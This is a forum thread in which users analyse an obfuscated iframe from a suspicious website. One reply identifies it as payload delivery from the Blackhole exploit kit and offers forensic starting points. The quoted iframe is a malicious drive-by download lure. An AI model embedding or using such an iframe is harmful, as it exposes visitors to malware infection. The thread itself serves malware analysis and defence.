Results 1 to 4 of 4

Thread: obfuscated java script that result to drive-by download

  1. #1

    obfuscated java script that result to drive-by download

    I Have been asked to analyze a website with suspicious activity such as drive-by download malware.

    The source code of page is this:

    <iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp= 30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>
    I can't understand the value of attribute that be sended to q.php through get method

    vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f
    Please help me and say how can I decode the encrypted value .
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    You cant decode that.

    Woodmann
    Learn Or Die.

  3. #3
    Woodmann's right. You can't.

    However, what you have to understand here, is that this website, was probably built by a hacker to be able to download malware on unsuspecting users. What this means, is that HIS website is not really protected very hard. In fact, I'd reckon he would be focusing more on his drive-by malware download payload execution, rather than HIS own website security.

    So, what does all this mean?

    What it means, son, is that you can use WGET (or any other OFFLINE DOWNLOADER), with the robots.txt set to OFF (wget specific only) and MIRROR the entire goddamned website! THEN, you can decrypt it and encrypt it and do whatever you want with it, because you will now have it's 'source code', which HAS to be present to be able to decrypt this gunk.

    Comprende? Let us know how it goes.

    Have Phun

    EDIT1: For some reason, the above looks like MAC addresses. Not sure, just a hunch.
    EDIT2: The kxt= part got me looking and I kind of stumbled upon this link
    Code:
    http://www.ai.mit.edu/courses/6.863/doc/ktext.html
    EDIT3: But the beauty is, if I put in
    Code:
    &kxt=1f:1d:1f:1d:1f:1d:1f
    in Google, I get a LOT of hits - a few are also javascripts which are similar to this. After this, it's a matter of tracing to get the the real meat-- Have Phun
    Last edited by Aimless; May 27th, 2013 at 07:36.
    Blame Microsoft, get l337 !!

  4. #4

    Blackhole Exploit Kit Delivery

    Quote Originally Posted by ansar313 View Post
    I Have been asked to analyze a website with suspicious activity such as drive-by download malware.

    The source code of page is this:

    <iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp= 30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>
    I can't understand the value of attribute that be sended to q.php through get method

    vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f
    Please help me and say how can I decode the encrypted value .
    You are lookin at one of many payloads delivered by a blackhole landing page. It is common to see the q.php? with those paramteres when an executable is being delivered. So if you have traffic logs you need to go back a bit and look for the landing page delivery (jar applets, pdf's, etc.) If this was part of a delivery to a system and you have an older version of java or flash I would look there first. Java cache folder and .idx files there are helpful.

    Something to mention is that they have been delivering exeutables through jar's for a while. What has changed is they are using the jar's as a crypto layer on top of the delivery. This is istarting to spread to many exploit kits out there.

    Here is some starting points to identify deliveries for this kit if you are interested. http://urlquery.net/search.php?q=%2Fq.php%3F&type=string&start=2013-05-16&end=2013-05-31&max=50; http://contagiodump.blogspot.com/2010/06/overview-of-exploit-packs-update.html; http://www.malwaresigs.com/category/exploit-kit-signatures/; and many more just google Blackhole Exploit Kit.

    Deliveries have ranged greatly on this kit. (Citadel, Zeus P2P, Zero Access, Rogue AV, etc.) Sometimes with a downloader in between like pony downloader.

    If you are looking at traffic analysis or malware to reverse then you should not just be looking at that exploit kit but many others. Some that I commonly see are Cool, Styx, Sweet Orange, Redkit, to name a few of the larger ones.

Similar Threads

  1. Replies: 1
    Last Post: February 4th, 2009, 16:54
  2. PHPScriptExec & CloneDll script & TASM exports generator script
    By roxaz in forum Tools of Our Trade (TOT) Messageboard
    Replies: 1
    Last Post: July 18th, 2008, 17:36
  3. ASProtect v1.23 drive me crazy :(
    By BruceLee in forum Malware Analysis and Unpacking Forum
    Replies: 3
    Last Post: September 25th, 2002, 20:49
  4. perl/ java script
    By tanya in forum Tools of Our Trade (TOT) Messageboard
    Replies: 1
    Last Post: January 16th, 2001, 01:17

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •